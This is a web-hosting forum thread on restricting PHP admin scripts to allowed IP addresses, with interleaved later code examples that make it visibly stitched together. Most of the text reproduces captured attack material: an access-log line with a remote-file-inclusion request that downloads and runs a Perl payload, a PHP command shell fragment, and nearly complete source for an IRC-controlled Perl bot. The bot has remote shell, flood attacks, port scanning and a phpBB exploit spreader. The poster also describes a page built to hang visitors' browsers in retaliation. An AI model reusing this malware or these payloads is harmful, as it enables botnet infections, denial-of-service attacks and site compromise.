ZOverLord
Premium Member
join:2003-10-20
Minneapolis, MN
How To Fortify Your PHP Based Web Site Admin Functions

Not everyone is a programmer, so here are some simple steps to help avoid abuse of any admin function if you have a PHP based web site.

This works if you have a dedicated IP address, and it stops admin function exploits. In most cases PHP based web sites have some program, normally called admin.php, that provides the admin functions.

If you have a dedicated IP address that you normally use to manage your PHP based web site you can do this to stop the current rash of exploits.

Make sure you save a copy while you test.

Using FTP, download a copy of your admin.php program and use Notepad to insert the following lines after the <?php line at the top:

// IP check for Admin functions in admin.php ZOverLord
// $_SERVER["REMOTE_ADDR"] is the address of the TCP peer the web server actually talked to.

if ($_SERVER["REMOTE_ADDR"] !== 'xx.xx.xx.xx') {
echo "You are ???????? and are ??????? STUPID as WELL!";
exit; // terminate here; a bare return would only leave the current file if admin.php is included by another script
}

// END of IP check for Admin functions in admin.php

Replace the xx.xx.xx.xx with your IP address. Try a wrong one FIRST to make sure you really deny the request, upload it via FTP to your site, then try the valid one.

If your IP address changes you can always follow the same procedure. If anyone needs an example for multiple IP address checks I can also show that as well. Initially trying to keep it simple.

You can also create your own message. I replaced some text with question marks for this post; use your imagination on what it was ;)

JTS33
Member
join:2003-05-03
USA

For those who don't have a dedicated IP, can you use wildcards? For example, if you wanted to allow all IPs which start with 87.126.x.x.

This would at least stop all of those who aren't using the same ISP as you.

ZOverLord
Premium Member
1 edit

said by JTS33:

For those who don't have a dedicated IP, can you use wildcards? For example, if you wanted to allow all IPs which start with 87.126.x.x.

This would at least stop all of those who aren't using the same ISP as you.
Well, in this example the IP must match the entire IP address.

There are ways using PHP to do partial IP compares, but this example does not support anything but the entire IP being compared.

You can also test this change at anytime by doing something like this:

http://anonymouse.org/cgi-bin/anon-www.cgi/http://<Your Web Site Goes Here!>/admin.php

state
stress magnet
Mod
join:2002-02-08
Purgatory

state to JTS33
said by JTS33:

For those who don't have a dedicated IP, can you use wildcards? For example, if you wanted to allow all IPs which start with 87.126.x.x.
This should work for partial IP matches:

php code:
// Escape the dots: in a regex a bare "." matches any character, so "^87.126." would also
// accept e.g. 871126x. eregi() was removed in PHP 7, so use preg_match() instead.
if (!preg_match('/^87\.126\./', $_SERVER["REMOTE_ADDR"])) {
echo "You are ???????? and are ??????? STUPID as WELL!";
exit;
}

Thug21
Just Chillin'
Premium Member
join:2005-08-21

Thug21 to ZOverLord
How would you do this for people that have a very dynamic IP, say one that varies around from 68.000.000.000 to 71.000.000.000

ZOverLord
Premium Member
4 edits

// IP check for Admin functions in admin.php ZOverLord
// Split on a literal dot: the pattern "/./" would match every character and leave only empty strings.
// Read the address from $_SERVER; a bare $REMOTE_ADDR only exists with register_globals switched on.
$ip = preg_split("/\./", $_SERVER["REMOTE_ADDR"]);
$first = (int) $ip[0];
if (($first < 68) OR ($first > 71)) {
echo "You are ???????? and are ??????? STUPID as WELL!";
exit;
}
// END of IP check for Admin functions in admin.php
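
Since the three variants posted so far (an exact address, the 87.126.x.x prefix, and the 68 to 71 first-octet range) are all the same allowlist idea, here is one guard that covers all of them with a CIDR comparison on REMOTE_ADDR. This is an added example, not code from ZOverLord's or state's posts; it assumes PHP 7.1 or later, IPv4 only, and the entries in ADMIN_ALLOW and the file name ipguard.php are placeholders.

```php
<?php
// Added example: an IPv4 allowlist guard for admin.php. Entries may be a single
// address ("a.b.c.d") or a CIDR prefix ("a.b.c.d/n"). Replace the placeholders.
const ADMIN_ALLOW = [
    '203.0.113.45',    // exact match: one dedicated address
    '87.126.0.0/16',   // prefix match on the first two octets (87.126.x.x)
    '68.0.0.0/6',      // 68.0.0.0 - 71.255.255.255: 68..71 share their top six bits
];

// True when dotted-quad $ip lies inside $cidr. The first n bits of both addresses are
// compared as 32-character bit strings, which avoids signed-integer surprises with
// ip2long() on 32-bit PHP builds. Anything malformed fails closed.
function ipv4InCidr(string $ip, string $cidr): bool
{
    $parts = explode('/', $cidr, 2);
    $bits = 32;
    if (isset($parts[1])) {
        if (!ctype_digit($parts[1]) || (int) $parts[1] > 32) {
            return false;              // bad prefix length in the config: never match
        }
        $bits = (int) $parts[1];
    }
    $ipLong = ip2long($ip);
    $netLong = ip2long($parts[0]);
    if ($ipLong === false || $netLong === false) {
        return false;                  // not a valid IPv4 address: never match
    }
    $ipBits = sprintf('%032b', $ipLong);
    $netBits = sprintf('%032b', $netLong);
    return substr($ipBits, 0, $bits) === substr($netBits, 0, $bits);
}

// True when $ip matches any allowlist entry.
function adminIpAllowed(string $ip, array $allow = ADMIN_ALLOW): bool
{
    foreach ($allow as $entry) {
        if (ipv4InCidr($ip, $entry)) {
            return true;
        }
    }
    return false;
}

// Call this first thing in admin.php. Only REMOTE_ADDR is consulted: it is the TCP peer
// the web server actually talked to. X-Forwarded-For and similar headers are written by
// the client and are worthless for this check unless your own reverse proxy sets them.
function requireAdminIp(): void
{
    $ip = $_SERVER['REMOTE_ADDR'] ?? '';
    if (adminIpAllowed($ip)) {
        return;
    }
    http_response_code(403);
    error_log("admin.php: denied admin access from '{$ip}'");   // leaves a trail for log review
    echo 'Access denied.';
    exit;   // exit, not return: return only ends the current file when admin.php is included
}

// Constructed addresses exercising each allowlist entry and its edges.
function selfTest(): bool
{
    $cases = [
        ['203.0.113.45', true],      // the exact entry
        ['203.0.113.46', false],     // neighbour of the exact entry
        ['87.126.9.200', true],      // inside 87.126.0.0/16
        ['87.127.9.200', false],     // second octet differs
        ['68.0.0.1', true],          // bottom of the 68-71 range
        ['71.255.255.254', true],    // top of the 68-71 range
        ['67.255.255.255', false],   // just below it
        ['72.0.0.1', false],         // just above it
        ['871.26.0.1', false],       // not an address: never matches
        ['', false],                 // missing REMOTE_ADDR fails closed
    ];
    foreach ($cases as [$ip, $expected]) {
        if (adminIpAllowed($ip) !== $expected) {
            return false;
        }
    }
    return true;
}

// In admin.php, right after the opening <?php:
//   require 'ipguard.php'; requireAdminIp();
```

Run `php -r 'require "ipguard.php"; var_dump(selfTest());'` after editing ADMIN_ALLOW, and keep ZOverLord's advice of testing with a wrong address first.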

Thug21
Premium Member

Thug21 to ZOverLord
Thank you.

ZOverLord
Premium Member

You are very welcome

ZOverLord
Premium Member
4 edits

There is a rising rash of PHP site exploits that I kind of got dragged into by my site being defaced. If you have a PHP based site, my suggestion would be to check your logs and see if you have any entries trying to pass another site name as a root path using any of your PHP admin interfaces.

These exploits may not even cause anything visually unusual on your site; however, your site can/could be used as a link to other PHP sites on the server that you are being hosted on. Even if this is not the case, your site could actually be supporting methods to gain access to many other PHP based sites, as a chain of sites used to attempt to hide the real IPs of the people using these exploits.

During my research/fortifying of my site I found that my site was being used by hundreds of people and linked to well over 50 other sites used for similar purposes.

This group is basically injecting PHP to provide scanning of thousands of sites at a time, as well as IRC chat room interfaces, and much more.

The most complicated thing was trying to DRILL down to the real IP addresses of this very large group, so I could provide them to the proper authorities. They use so many other sites as a bridge that by the time you try to isolate their IP, you and they are sometimes buffered by as many as 5 other web sites they are using as bridge sites to get to you.

This chain is automated, so when a link in the chain ("My Site") suddenly stops bridging to the next site and so on, their communications link FAILS, and they have a very hard time trying to locate which one of their bridge sites used as a link failed.

So, here is what I did to isolate their IPs; please note this only works with IE for the moment, but it turns out most of them had IE anyway.

In June of 2005, Mark at Sysinternals did an article on Pop-Up Blockers and how they can be defeated:

»www.sysinternals.com/blo ··· ker.html

I took his example from Malware.com ("There is a Link on Mark's Blog in the above link") and modified it for PHP. My version is much more nasty, and can actually provide the IP address of the actual person attempting to exploit a PHP web site, provided they are using IE ("Working on methods for other browsers"), but it shuts down all access to all my Admin functions by everyone but me.

If someone would like to implement this concept on their PHP web site, just shout; I will give you the 3 files and the PHP stub code that needs to be in your Admin modules.

For the daring, you are more than welcome to go to this address with your browser to see what NOW happens when others attempt to use my Admin functions on my site. Please be aware that it contains, shall we say, some "Harsh" language, and make sure you have your task manager open so that you can kill IEXPLORER.EXE if needed.

I could use some feedback on what browsers supply the REAL IP address ("I don't have all browsers"). I have tested with Firefox ("Only Displays One Page"), AOL Browser and IE.

An example of a link that attempts to hide your real IP address, so you can see this, would be:

Please be aware, you MAY need to kill IEXPLORER.EXE to recover and stop this.

http://anonymouse.org/cgi-bin/anon-www.cgi/http://testing.onlytherightanswers.com/admin.php

Of course you could use others.

This group has moved on once I broke their communications chain, and they provided me most of their IP addresses while they poked around, which I reported to the proper authorities. It's important to note I said "Moved On" because groups like this have way too many victim sites to ever really go away.

I also went to some of the other sites in the chain ("My site was being used for ALL menu options to the sites that hosted them, so I was able to see what was "Parked" and being used for all the menu options; in most cases these options were stored in the TMP directory on those sites, but not in every case") and was amazed at how sophisticated this group was/is. Each web site in the chain hosts some add-in tool for them: a scanner, IRC chat, many other tools that they pick and choose from by menu option. I actually found their login/password interface with near 100 IDs to use the chain my site was in.

That's part of their problem, I think, in this case: their menu options link to specific sites for each option, but the users of the menu don't easily know which menu option goes to what site, so when the users' communication chain fails, they get stuck for a while trying to find out what is going wrong.

Actually my site was a bridge to the other sites supporting the menu option chain ("My Site was being used as a bridge to get from the menu options to the sites supporting that menu option, most likely to hide their IP addresses, so it would look like my site went to the sites supporting the menu options, not them") and was used for routing, so when I fortified my site, most if not all of their menu options failed. "They FREAKED!"

By spreading their menu options across many web sites, if one site is "Locked Down" they simply look for another, hack that site to support that menu option, and update their menu, so there must be a select few in the group that maintain the menu linkage. They also seem to use a chain of sites to bridge to the sites that have the menu option; this must be to mask server logs and create confusion, and it works well, since most of the victim sites have no idea they are in the chain.

Hopefully, if you maintain a PHP based site, they have not moved on from my site to you.

As stated earlier, if anyone wants the code that does this, shout and I will send it to you in a Zip file; it is actually very small for what it does.
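
The log check suggested at the top of this post (look for requests that pass another site's URL as a root path to an admin script) can be scripted. This is an added example, not code from the thread or from ZOverLord: a small PHP CLI scanner for Apache/NCSA access logs. The log lines in SAMPLE_LOG are constructed for the example with documentation addresses and an assumed parameter name of phpbb_root_path, as in the thread; to scan a real log, pass file_get_contents('/path/to/access_log') instead.

```php
<?php
// Added example: flag requests whose query parameters carry a URL, the remote file
// inclusion pattern described in this thread. SAMPLE_LOG is constructed test data.
const SAMPLE_LOG = <<<'LOG'
198.51.100.7 - - [16/Jun/2006:20:54:28 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://example.net/x/cmd.txt?&cmd=id HTTP/1.0" 200 512
198.51.100.7 - - [16/Jun/2006:20:54:29 -0700] "GET /modules/Forums/admin/admin_board.php?phpbb_root_path=http://example.net/x/cmd.txt? HTTP/1.0" 200 512
192.0.2.10 - - [16/Jun/2006:21:01:02 -0700] "GET /modules.php?name=Forums&file=viewtopic&t=42 HTTP/1.1" 200 8844
192.0.2.11 - - [16/Jun/2006:21:02:15 -0700] "GET /admin.php?op=redirect&url=https%3A%2F%2Fexample.net%2Fevil.txt HTTP/1.1" 403 25
192.0.2.12 - - [16/Jun/2006:21:03:40 -0700] "POST /admin.php HTTP/1.1" 200 1203
LOG;

// Parse one common/combined log line into its fields; null if the line does not match.
function parseLogLine(string $line): ?array
{
    if (!preg_match('~^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)(?: \S+)?" (\d{3})~', $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'target' => $m[4], 'status' => (int) $m[5]];
}

// Split a request target's query string into name => decoded value pairs. parse_str()
// is avoided on purpose: it rewrites dots in names and turns "[]" into arrays.
function queryParams(string $target): array
{
    $pos = strpos($target, '?');
    if ($pos === false) {
        return [];
    }
    $params = [];
    foreach (explode('&', substr($target, $pos + 1)) as $pair) {
        if ($pair === '') {
            continue;
        }
        [$name, $value] = array_pad(explode('=', $pair, 2), 2, '');
        $params[urldecode($name)] = urldecode($value);
    }
    return $params;
}

// One finding per query parameter whose decoded value is itself a URL. Every such
// parameter is reported, not only phpbb_root_path, because script and parameter names
// change from one exploit to the next; the finding names the parameter so that a
// legitimate redirect target can be told apart from an include of remote code.
function findRemoteIncludeAttempts(string $log): array
{
    $findings = [];
    foreach (preg_split('~\R~', trim($log)) as $line) {
        $rec = parseLogLine($line);
        if ($rec === null) {
            continue;
        }
        foreach (queryParams($rec['target']) as $name => $value) {
            if (preg_match('~^(?:https?|ftp)://~i', $value)) {
                $findings[] = [
                    'ip'     => $rec['ip'],
                    'time'   => $rec['time'],
                    'script' => explode('?', $rec['target'], 2)[0],
                    'param'  => $name,
                    'url'    => $value,
                    'status' => $rec['status'],   // a 200 here means the include may have run
                ];
            }
        }
    }
    return $findings;
}

// Attempts per client address, busiest first: the "many requests from many IPs" view.
function attemptsByIp(array $findings): array
{
    $counts = [];
    foreach ($findings as $f) {
        $counts[$f['ip']] = ($counts[$f['ip']] ?? 0) + 1;
    }
    arsort($counts);
    return $counts;
}

$hits = findRemoteIncludeAttempts(SAMPLE_LOG);
foreach ($hits as $h) {
    printf("[%s] %s %s %s=%s (HTTP %d)\n", $h['time'], $h['ip'], $h['script'], $h['param'], $h['url'], $h['status']);
}
print_r(attemptsByIp($hits));
```

On the constructed sample this reports the two phpbb_root_path requests from 198.51.100.7 and the encoded url= parameter from 192.0.2.11, and leaves the ordinary forum request and the POST alone.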

Cudni
La Merma - Vigilado
MVM
join:2003-12-20
Someshire

using tor and ff i get a rude message

Cudni

ZOverLord
Premium Member

said by Cudni:

using tor and ff i get a rude message

Cudni
Thanks, yes, ff only displays one page, and of course the text can be changed.

The method I used works best with IE at the moment; I am working on some code to do what happens in IE in ff.

In all cases the person(s) attempting to gain access are still denied; it's just that if they are using IE, it's not a pretty sight for them.

Some might say "If you make them MAD, things will get worse". Well, after doing extensive reviews of my site log ("Which is more of a hobby site"), on a normal day 20-50 attempts were made on average, before this large group called my site home, lol.

garys_2k
Premium Member
join:2004-05-07
Farmington, MI

garys_2k to ZOverLord
Opening that with IE, I get an Office install dialog, which I kill (have to hit cancel twice) and that's it. No way I'd let a page mess with Office stuff.

ZOverLord
Premium Member

said by garys_2k:

Opening that with IE, I get an Office install dialog, which I kill (have to hit cancel twice) and that's it. No way I'd let a page mess with Office stuff.
Funny, it's not really anything to do with Office, but it is an ActiveX control by Microsoft for their DHTML editor. I don't have Office here, I have OpenOffice, but it's nice to know that if you have Office, you get that prompt.

ZOverLord
Premium Member

Ok, I have been asked to break this down a little bit, so I will show you what is going on. Remember I have a Nuke site, so try to follow along even for other PHP based sites.

My site name is testing.onlytherightanswers.com ("One subdomain, that is"). After my site was defaced I did some deep log analysis. I found many requests from many different IP addresses:

85.195.123.29 - - [16/Jun/2006:20:54:28 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.exchangechannel.com/welcome/family/php/images/.xpl/cmd.txt?&cmd=cd%20/tmp;fetch%20http://www.exchangechannel.com/welcome/family/php/images/.xpl/flux;perl%20flux;rm%20flux*? HTTP/1.0"

So I broke this down and checked what was going on. The contents of cmd.txt is:


&1");
else
@passthru("$cmd");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output))
echo str_replace(">", ">", str_replace("<", "<", $output));
}
else
echo "No command to execute.";
}
else {
echo "Due to SafeMode, it's unable to execute commands!\n";

echo "Machine informations:\n";
echo "PHP: ".phpversion()."\n";
echo "Server: $SERVER_SOFTWARE $SERVER_VERSION\n";
$uname = @posix_uname();
if (!empty($uname)) {
while (list($info, $value) = each($uname))
echo "$value ";
echo "\n";
}
$uids = @posix_getlogin();
$euids = @posix_getlogin();
$uid = @posix_getuid();
$euid = @posix_geteuid();
$gid = @posix_getgid();
if (!empty($uid))
echo "User: uid=$uids($uid) euid=$euid($euid) gid=$gid($gid)\n";
}

?>

The contents of flux is:

#!/usr/bin/perl
# #myhack crew (KingFighter)
# PVT!! PVT!! PVT!!

my @nickname = ("index.php?page=",
# ... about 1,160 more quoted surnames, one per line, elided from this listing ...
"Zwiers");

my $nick = $nickname[rand scalar @nickname];

my $ircname = $nickname[rand scalar @nickname];

my $processo = 'httpdse';

system("kill -9 `ps ax |grep httpde |grep -v grep|awk '{print $1;}'`");

# funny world...

my $linas_max='4';
my $sleep='5';
my @adms=("KingFighter","apaii");
my @hostauth=("leet.net");
my @canais=("#conn");
chop (my $realname = 'id');
$servidor='emilya1.no-ip.org' unless $servidor;
my $porta='6667';
my $VERSAO = 'Cygrip powered by KingFighter';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}

sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];

my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;

$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);

$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);

for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}

sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick|".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal ddosit");
}
}
}

sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}

if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
}
}
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);
}
if ($funcarg =~ /^xxx\s+(\d+)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[PHP-NUKE]\002 Scanning for unpatched admin_board.php for ".$1." seconds.");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url =$path."/modules/Forums/admin/admin_board.php?phpbb_root_path=$boturl?";
$page = http_query($url);
$exploited = $exploited + 1;
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[PHP-NUKE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
}
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}

sub ircase {
my ($kem, $printl, $case) = @_;

if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}

sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}

sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}

sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}

sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}

# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
#

sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);

my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
